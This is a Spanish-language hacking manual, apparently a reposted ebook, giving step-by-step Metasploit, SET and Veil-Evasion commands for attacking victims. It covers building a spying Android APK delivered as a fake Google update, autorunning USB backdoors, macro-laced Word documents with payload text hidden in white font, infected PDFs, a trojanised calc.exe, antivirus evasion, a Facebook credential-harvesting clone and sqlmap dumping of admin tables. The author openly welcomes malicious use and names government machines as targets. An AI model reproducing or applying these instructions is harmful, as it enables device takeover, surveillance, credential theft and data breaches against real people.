Kali Linux Guia Del Hacker Version 1.0

October 17, 2017 | Author: Enrique | Category: Email, Malware, Computer File, Android (Operating System), Portable Document Format
Share Embed Donate


Short Description

Descripción: Kali linux 1.0...

Description

1

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

2

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

3 LIBRO ESCRITO POR: D1n-r3X {Hacker Ético} El Autor de nacionalidad Mexicana declara que no dará información personal de su verdadero nombre y datos personales ya que por motivos personales y legales no se hará responsable por el uso de este libro, este libro no es con fines de lucro, es una redacción de los conocimientos del autor D1n-r3x Sistemas operativos usados en estelibro Windows 7 Ultimate x64 bits (sistema primerio) Kali Linux 1.0.9ª x64bits (sistema virtual) Parrot-Security os 1.6 x86bits (sistema virtual)

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

4

COMANDOS BASICOS DE METASPLOIT Primero veremos como iniciar los servicios de metasploit de forma manual, Ya que en algunos casos es más complejo, pero nos facilitara trabajo y tiempo.

Los comandos a iniciar son los siguientes # service postgresql start #service metasploit start #msfconsole [Con estos comandos iniciamos la consola de metasploit] es necesario iniciar siempre os servicios de metasploit ya que sin ellos no iniciara a la hora de hackear, También los podemos iniciar de la siguiente forma. Aplicaciones/Herramientas de explotación/metasploit/metasploit community pro

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

5

HACKEAR ANDROID CON APK [Desde una consola de Metasploit]

Con los siguientes comandos que aparecen se crea un apk maliciosa msfpayload Android/meterpreter/reverse_tcp LHOST=198.66.1.0 LPORT=8080 x > malware.apk /root/Desktop/ LHOST Aquí vamos a poner la IP de la maquina kali Linux LPORT Aquí va el puerto al cual se va a conectar la apk maliciosa /root/Desktop Guardara el apk en el escritorio de kali Linux La IP de Linux la podemos ver con el comando #ifconfig NOTA : Para que este método funcione correctamente el teléfono con cualquier versión de Android debe de dejar instalar aplicaciones con orígenes desconocidos, ya que no tiene forma de autor ni licencia.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

6

en esta pagina Http://www.wetransfer.com podemos enviar archivos de forma anónima o bien lo podemos enviar desde un correo ya sea Gmail,yahoo,Hotmail etc. Add files, aquí cargamos el malware.apk Friend’s email el email de usuario Android al cual le enviaremos el apk maliciosa, bueno es importante que sea el correo que tiene como cuenta en google play store Your email, aquí puede ir un correo falso, ejemplo [email protected] Message, Aquí es importante que tenga algo por ejemplo una actualización de google para el teléfono, alguna noticia o promoción, etc. El apk la tiene que intalar la victima en su teléfono Android, no importa la versión ya una vez que la victima lo haya instalado y asu vez abra la aplicación nos dara acceso remoto a todo el teléfono, contactos, llamadas, mensajes, fotos. Tambien podremos manipular la cámara y micrófono a nuestra veneficio

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

7

EXPLOIT CARGADO EXITOSAMENTE Ya que la victima descargo la aplicación también nos acaba de dar acceso remoto a su teléfono como vemos aquí con el comando sysinfo, vemos la versión de Android que tiene el teléfono

Como podemos ver aquí algunos de los comandos para el acceso al telefono en este caso se uso el comando webcam_snap 2 El cual no toma una foto con la cámara y la guarda en la carpeta /root/ de kali Linux webcam_snap es la cámara del telefono en este caso la 2 que es la cámara trasera del telefono, y la 1 es la cámara delantera con la cual podemos ver a la persona detrás del telefono.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

8

BACKDOOR BAD-USB METODO 1° {Puerta trasera} Archivo bat indetectable & en USB autoejecutable Iniciamos setoolkit con el comando setoolkit, en una nueva terminal ya iniciado seleccionamos la opción 1) Social engineering attacks Despues la opción 10) Powershell attacks vectors Despues la opción 1) Powershell alphanumeric Shell code injector

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

9

Como vemos aquí ya hay 2 terminales una de setoolkit y otra nueva por debajo la cual es la ruta de archivo bat malicioso En setoolkit ponemos la IP de kali, y el puerto Despues en la opción de YES para iniciar el metasploit y en la otra terminal como podemos ver es la ruta del archivo bay en formato txt, la ruta es la siguiente # cd /root/.set/reports/powershell # ls {para ver la lista de archivos} # cp x86_powershell_injention.txt /root/Desktop con el comando cp copiamos el bat al escritorio para editarlo a .bat para eso hay que renombrar el .txt por .bat

Como vemos ya está a la escucha esperando el BAT-USB para hacer esto es necesario convertir el bat a exe en windows en este caso en windows 7, en mi maquina que se usara como victima y acerlo auto-ejecutable he invisible al ojo humano, ya el sistema puede que lo detecte pero no haga nada, este bat fue probado con antivirus y es indetectable , ya que algunos exploits de kali, ya son muy comunes y detectados pero este no.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

10

Pagina del 1er programa http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html Aquí está la primer parte que es convertir el BAT a EXE para que el otro programa lo haga auto ejecutable al momento de conectar El exe debe de guardarse en la memoria, el bat se puede borra o guardar como ustedes gusten en este programa podemos ponerle icono al exe para que se vea más aceptable a la víctima yo use un icono de CMD ya que es el programa que abrirá al momento de insertar la usb en el ordenador El 2do Programa es de licencia asi que dejare la página oficial para evitar estragos en mi contra. ya que el programa crea archivos nuevos que pueden ser modificados ya creados, los archivos no son detectables ya que el programa los uso como archivos importantes de la memoria usb http://www.samlogic.net/demos/demos-register-usbac.htm NOTA: setoolkit también tiene una función de crear un archivo auto ejecutable pero el antivirus lo detecta por lo cual yo tome en cuenta eso y mejor convertí el archivo para ser indetectable ante la mayoría de los antivirus

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

11

Una vez creados y ocultados de la computadoras comunes solo falta extraer la USB y volverla a poner para ver como corre nuestro virus Recuerden que metasploit se quedó a la esperando el payload así que vamos a dárselo

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

12

Aquí se ejecutó al momento de conectar el USB y de lado izquierdo esta meterpreter esperando a que termine de cargar el PAYLOAD

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

13 Para iniciar Meterpreter usamos el comando sessions –i 1 claro ya viendo que nos cargó el exploit con éxito

como podemos ver hay que mover el virus de la memoria a la computadora por si nos desconectan la usb usaremos los comandos ps, para ver procesos id y migrate N° de proceso id

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

14

OFFICCE BACKDOOR {shikata_ga_nai} {indetectable}

Como podemos ver aquí creamos un payload con extensión EXE, para después proceder a convertirlo a VBA y poder inyectar el código en el documento de office escriben el siguiente código que se muestra en la imagen de arriba msfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.64.134 LPORT=4444 ENCODING=shikata_ga_nai x > /root/Desktop/docx.exe Este nos creara un EXE en el escritorio No olvides que los comando LHOST, LPORT se configuran a nuestra maquina Linux, es decir la IP en LHOST y el puerto deseado. En esta captura de abajo veremos los siguientes comandos locate exe2vba.rb cd /usr/share/metasploit-framework/tolos/ ruby exe2vba.rb /root/Desktop/docx.exe /root/Desktop/docx.vba {este último comando nos dará nuestro archivo VBA}

Aquí ya creado el .EXE con los siguientes comandos se convertirá a un archivo .VBA para poder leerlo y encriptarlo en una macro de office, y ya creado lo pasamos el archivo .VBA a una memoria USB para proseguir con la macro.

Nos dirigimos a vista, y creamos una nueva macro, elegimos el nombre que preferimos, guardan la macro en la casilla de guardar AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

15 Después que este la macro lista seguiremos con la inyección del texto codificado por shikata_ga_nai IMPORTANTE, al copiar el texto se crearan varias hojas es recomendable cambiar el tamaño y color en este casa tamaño 1 color blanco de preferencia para evitar que la víctima ver a algo inusual

El archivo lo guardamos como Documento Word con macro habilitada la extensión de archivo es .docm ya guardado el archivo lo cerramos y se envía a la víctima, iniciamos metasploit con las configuraciones de handler y el puerto y la misma IP con la creamos el archivo exe esperamos a que la víctima abra el documento y listo ya tenemos sesión de meterpreter estas captura se hicieron desde mi pc con una máquina virtual para hacer ambos procesos a la vez.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

16

PDF INFECTADO Método 1 {puede ser detectado por algunos antivirus}

cargamos la consola de metasploit, ya previo los servicios de posgresql y metasploit para iniciar la consola una vez iniciado metasploit usamos el comando use exploit/Windows/fileformat/adobe_pdf_embedded_exe NOTA: antes de seguir necesitamos un PDF que no esté infectado , ejemplo un archivo falso con información que a la víctima le parezca interesante ya sea una revista por etc., depende de la víctima en este caso usare un archivo que sería el libro pero en formato PDF, esto es solo para demostrar este exploit el archivo publicado no tendrá ningún tipo de malware ya que este PDF es una prueba del libro sin terminar. Este exploit lo que ara en inyectar el código en un PDF para que cuando la víctima lo abra nos de acceso a su sistema sin darse cuenta es difícil que la víctima se dé cuenta dado que con el método de documento de office puede que se dé cuenta por la extensión del archivo ya que es una extensión .docm {documento con macro habilitada} prosigamos con este otro método.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

17

set filename D1n-r3X.pdf [ pueden poner el nombre que se les de en mente pero debe de terminar en .pdf ] set infilename /root/Desktop/”LA BIBLIA”.pdf [las comillas dobles son solo si el archivo tiene algún espacio en el nombre, sino es así no son necesarias ] set outputpath /root/Desktop/ [ es para copiar el contenido del PDF al pdf infectado ] set lhost ip de Linux aquí set lport 4444 [ este puede varia depende del puerto abierto en la pc victima] exploit [ aquí nos generara el PDF infectado en la carpeta /root/.msf4/local/ en una nueva terminal ejecutamos el comando siguiente

Podemos apreciar aquí el PDF original y el PDF infectado a simple vista parecen iguales con los siguientes comandos copiamos el contenido al escritorio de kali Linux cd /root/.msf4/local ls [ lista de archivo en carpeta de local ] cp D1n-r3X.pdf /root/Desktop [ comando de copiar archivo con ruta al escritorio]

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

18 Una vez hecho lo siguiente configuramos nuestro metasploit a la escucha para que espere el payload del PDF infectado

Por algún motivo no me cargo el exploit pero el AV lo detecta como malware

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

19

PDF INFECTADO Método 2

Comandos a seguir use exploit/Windows/fileformat/coolpdf_image_stream_bof set payload Windows/reverse_tcp set lhost set lport exploit {el PDF se guarda en la carpeta root/.msf4/local con el nombre de msf.pdf}

Con los siguientes comando copiamos el archivo PDF a nuestro escritorio, como vemos en la imagen se ha creado con éxito, ya una vez copiado al escritorio ya sea que lo mandemos por mensaje o por correo anónimo, yo en este caso infectare a la víctima pasando el archivo a una memoria USB, pero ustedes puede usar su ingenio para ver el método que le convenga más para lograr que el payload se cargue correctamente.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

20

HACKEO DE FACEBOOK {SETOOLKIT} Abrimos setoolkit con el comando #setoolkit una vez abierto selecionamos la opción 1 Ataque de ingeniería social, previo a esto selecionamos la 2 ataque a vectores de sitio web, una vez hecho esto proseguimos con la opción 3 Ataque a credenciales con el metodo havester. una vez finalizado ponemos nuesta ip de kali Linux y la pagina la cual se desea optener los datos de usuario en este caso será la de Facebook , esto lo que ara es crear una pagina temporar con el servidor de apache abrimos una nueva terminal para ello es necesario iniciar los servicios de apache con el comando # service apache2 start. ya una vez hecho esto mandamos el url el cual en este caso seria la ip de kali Linux la cual será una clonación de la pagina de Facebook login. { el usuario ingresa sus datos y obtendremos su correo y contraseña}

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

21

En cuanto la victima aceda a la página clonada no envía sus datos personales como podemos ver en la imagen de la derecha tenemos el correo y la contraseña que se escribió en la página de Facebook este archivo se guarda en la carpeta var/www es un archivo de texto .txt

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

22

HACK WINDOWS THEME {SOLO PARA WINDOWS XP SP3}

Este metodo solo funciona en windows xp sp3 ya que tiene una vulnerabilidad a este exploit el cual no es detectado como malware en Sistema xp. { la mayor parte de computadoras gubernamentales y de a sociaciones de gobierno en mexico tiene dicho sistema xp asi que alos interesados les recomiendo un análisis de las paginas de gobierno con FOCA, el cual es un programa de análisis de metadatos, pero no me enfocare en ese tema ya que es bajo Windows y este libro será exclusivo para kali Linux}

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

23

INYECCION DE BACKDOOR EN CUALQUIER ARCHIVO EXE usaremos el codificador shikata_ga_nai para la inyección inversa de el payload en nuestro archivo ese, en este caso usaremos la calculadora de la maquina victima la cual tiene windiwows 7 -----------------------------------------------------------Nesesitamos el archivo exe el cual lo podemos encontrar dando click derecho y en abrir ubicación del archivo copiamos el archivo a una usb para poder modificarlo y cargar el payload en un nuevo archivo malicioso ------------------------------------------------------------------------------Una vez hecho esto nos pasamos a nuestro sistema kali Linux para seguir con lo siguiente, la codificación con el exe a el exe cargado con el payload

Con los siguientes comandos en una terminal

msfpayload Windows/meterpreter/reverse_tcp LHOST=180.880.11.1 LPORT=4444 R | msfencode –e x86/shikata_ga_nai –c 5 –t exe –x /root /Desktop/calc.exe –o /root /Desktop/calc2.exe -------------------------------------------------------------------------------------------------------------------------------------------------------------------El archivo se guarda en el escritorio de kali, este método puede emplearse con auto ejecución como en el archivo bat, ya que es una aplicación,se puede hacer con un juego exe, y por supuesto cambiar el icono para que caiga la victima -------------------------------------------------------------------------------------------------------------------------------------------------------------------Despues de esto pasamos el payload calc2.exe a la memoria usb, ya en ello hay que hacer que la victima lo ejecute {EJEMPLO} > Es una nueva calculadora científica de Microsoft , que tiene mejor rendimeinto del sistema y además crea alternativas de algebra y algoritmos de física, etc.< (Solo funciona en Windows xp )

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

24

BACKDOOR BAD-USB METODO 2°

{solo Windows xp}

Este método es con el programa SETOOLKIT a diferencia de el método uno esta opción es solo con la herramienta de SET, nos crea el archivo .exe junto con el archivo .inf (los comandos del autoejecutable en usb,cd,dvd)

Despues de la opción 1 Fileformat exploit, pondremos la ip de kali, seleccionamos la opción 12 adobe pdf embedded exe social engeneering al teminar eso ponemos la ruta de nuestro archivo pdf original al cual se creara una copia con un inyecion maliciosa, en este caso la ruta a seguir es /root/Desktop/kali.pdf NOTA: yo usare meterpreter a 64bits, pero en su caso es probable que que utilicen a x32bits, eso se vera en la siguiente imagen.

En su caso usen la opción 2 , yo usare la 5 ya que será a x64bits solo si la vicma corre un sistema a x64bits , por lo regular son maquinas sensillas a esepsion de windows8 y 10 que usan sistemas de x64, xp,vista 7 casi siempre son a x32bits AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

25

En la ruta de cd /root/Desktop/.set/ hay un archivo llamado template.pdf y uno llamado autorun.inf, ambos se deben de copiar a nuestro pendrive para la ejecución de nuestro payload de forma remota. Con este comando vemos los archivos creados de setoolkit ya una vez creados y copiado damos en la opción yes, para cargar nuestro metasploit precargado gracias a set Esta vulnerabilidad es únicamente para sistemas operativos con Windows xp se mal, pero no tanto ya que las mayor parte de las empresas en todo México y el mundo aun usan este sistema ya sea por programas de la misma empresa que por lo general hacen programas de mano factura, tales empresas ya sea de gobierno, o de alguno grande o mediana empresa, inclusive de alguna escuela.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

26

Exploit Usando Msfvenom Windows 7

msfvenom –p windows/meterpreter/reverse_tcp –e x86/shikata_ga_nai –i 5 –b ‘\x00’ LHOST=180.188.78.1 LPORT=443 –f exe > /root/Desktop/gta.exe {Este es el comando para crear nuestro archive con shikata ga nai, en este caso el gta.exe ya que tengo algunos iconos del gta, y talves lo pase como un crack para no cd

Como vimos antes ya creado el exploit vamos a nuestro metesploit y usamos los siguientes comandos use exploit/multi/handler set payload Windows/meterpreter/reverse_tcp set lhost set lport

Analizado en virus total. Es detectable por la mayoría de los antivirus, Este exploit no necesita permisos de administrador AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

27

CODIFICACION DE TROJANO EN BINARIO

msfpayload windows/meterpreter/reverse_tcp LHOST=ip de Linux aquí LPORT=4444 X > /root/Desktop/msf.exe Este es el trojano normal sin codificacion msfpayload windows/meterpreter/reverse_tcp LHOST= ip aquí LPORT=444 R | msfencode –e x86/countdown –c 2 x86/shikta_ga_nai –c 2 > /root/Desktop/msfencoded.exe Este otro esta codificado con shikata_ga_nai Los podemos usar con la consola de metasploit y exploit/multi/handler y los parámetros que ya conocemos aquí la detecion de los antivirus en virustotal.

Este es el primer archivo sin codificar

Este es el segundo archivo, hay otras alternativas de codificación pero en este caso se provo la de shikata_ga_nai que no sirve ya que la mayoría de los antivirus lo detecta, pero no procupen que en este libro estará lo que usted busca para su veneficion con o sin fines velignos a la sociedad.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

28

EVASION DEL ANTIVIRUS CON VEIL-EVASION {Instalacion de veil & configuración}

Esto para actualizar nuestro kali Linux antes de la instalacion de veil-evasion 1- apt-get update 2- apt-get upgrate

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

29

------------------------------------------------------------------------------------------------------------------------------------------------------------------------Aquí clonamos la página de veil-framework, y seguimos con la instalación Aparecerá un cuadro de dialogo escribimos y para seguir -------------------------------------------------------------------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------------------------------------------------------------------Esto puede demorar unos minuto en lo que se descarga los archivos necesarios que utiliza Veil-Evasion ------------------------------------------------------------------------------------------------------------------------------------------------------------------------AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

30

después de la descarga de paquetes inicia la instalación de python,y otras 2 aplicaciones más los pasos para instalar las aplicaciones son iguales a los de windows, y son necesarios para Veil-Evasion, ------------------------------------------------------------NOTA: Esto demora unos minutos , yo uso el sistema en una máquina virtual la cual me permite guardar las configuraciones y descarga de kali, en el caso de hacer estos pasos en dvd, usb, no guarda nada,

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

31

Terminado estas instalaciones, procedemos a ejecutar nuestro programa Veil-Evasion en la terminar que estábamos usando usamos el comando cd .. {esto nos regresara una carpeta atrás a la carpeta de Veil, y escribimos el siguiente comando python Veil-Evasion.py esto nos ejecutara el programa ya completo.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

32

Es la misma instalación, para iniciar veil, hay que usar el comando { chmod +x Veil-Evasion.py , este comando debe de ir antes de iniciarlo con python, para descargar python usaremos el comando, apt-get install python-mechanize }

Con el comando list, veremos los payloads disponibles con esta versión de veil tiene 37 disponibles, para ser indetectables probaremos algunos de ellos, Veil Framework , es una herramienta muy similar a metasploit, pero su funcionalidad es crear payload que los antivirus no eliminen y además en una manera más sencilla de usar.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

33

Después del comando list, seleccionamos el payload número 36), ya que la codificación de este no es detectada inclusive es mejor que el bat de setoolkit, lo configuramos con los siguientes parámetros: set LHOST ip de Linux set LPORT 4444 {Esto puede variar} generate {esto nos generó nuestro archivo exe

Aquí hay dos opciones 1° press [enter] for “payload” { Esta opción nos genera el payload con el nombre en las comillas “ “} 2° Aquí podremos un el nombre el cual se le va a dar a nuestro virus { En este caso, payloadfinal}

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

34

Ya creado el payload se guarda en la carpeta siguiente de kali Linux cd /root/veil-output/compiled/payloadfinal.exe {aquí ejecutare el payload en un windows para provarlo}

Se ejecuta sin necesidad de control de cuentas de usuario ya que en windows 7 & 8 tienen activada esta función el payload no carga nada, a simple vista, pero lo que la victima no sabe esque no dio acceso total a su maquina.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

35

Configuramos el exploit/multi/handler use exploit/multi/handler set lhost {ip Linux} set lport 4444 set payload windows/meterpretera/reverse_tcp exploit El exploit cargo al instante al momento de su ejecución, y además es detectable por 2 de los 56 antivirus que nos permite analizar virus total.

Este imagen de abajo es de mi avast, y tampoco lo detecta como amenaza de ningún tipo

NOTA: Hay varios payloads en Veil-Evasion pero uno de los mejores que he probado es este ya que no hay antivirus comercial que lo pueda detectar además como avía dicho no requiere permisos al ejecutar, y no ejecuta cmd, por lo cual es perfecto para hacer algún trabajo por Etica 3:)>

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

36

Iexplorer update {PARROT-SEC} Nota algunos antivirus pueden bloquear esto

Una vez hecho esto con el commando use exploit/windows/browser/ie_cgenericelement_uaf, proceguimos ala configuracion de nuestro exploit con el commando show options y cambiaremos algunas opciones como SRVHOST, SRVPORT

Despues de configurar el SRVHOST con nuestra ip de parrot-sec, proseguimos a configurar nuestro objetivo en este caso windows 7, configuramos con el siguiente comando. Show targets , Despues con set TARGET 4 Despues de set LHOST , usamos el comando exploit , y enviamos el enlace malintecionado, y listo.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

37

WEPSPLOIT HOMBRE EN MEDIO ‘MITM’

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

38 Con el comando use ( selecionamos el modulo, similar a metasploit) vamos a usar el modulo network/mitn Despues con el comando show options Veremos las opciones a configurar en este caso será el router y la ip de la pc vitima también se puede configurar el sniffer

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

39

SQLMAP (Ataque a paginas web)

Con el comando siguiente podemos analizar la pagina simpre y cuando la pagina sea vulnerable con php?= sqlmap –u www.pagina-vulnerable.com/etc.php?=27 –dbs En este comando si la pagina es vulnerable nos aparecerá un dialogo con los siguientes términos (Y/N) En este caso usaremos la Y y poseguimos a presionar ENTER.

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

40

Ya utilizando la opción de yes en abreviación y, veremos que la pagina carga las Bases de Datos de qui vamos a seleccionar una, Este puede variar depende de la pagina en algunas puede mostrar mas bases de datos o bien puede que solo salga una, Este pagina me a mostrado 2 Bases de Datos, (Esto esta en la pagina siguiete)

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

41

Como vemos en la imagen, Tenemos 2 bases de datos disponibles, vamos seleccionar la bas, ampos_ampoweb con el siguiete orden de comandos sqlmap –u www.pagina-vulnerable.com/etc.php?=27 –D ampos_ampoweb –tables Explicacion breve. -D ( Este comando es la orden a ejecutar de la base de datos seleccionada) --tables (En este campos ejecutamos un orden de tablas de la base de datos)

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

42

Aquí podemos ver que son 30 tablas disponibles..

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

43 Aquí podemos ver las tablas disponibles en este caso vamos a seleccionar la siguiente tabla

Con el comando que se mostrara en la pagina siguiente nos va a mostrar las columnas de administración de la pagina. el comando es el siguiente sqlmap –u www.pagina-vulnerable.com/etc.php?=27 –D ampos_ampoweb –T admin_contenidos --columns

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

44

AUTOR DEL LIBRO:

D1n-r3X

[Hacker Ético]

View more...

Comments

Copyright ©2017 KUPDF Inc.
SUPPORT KUPDF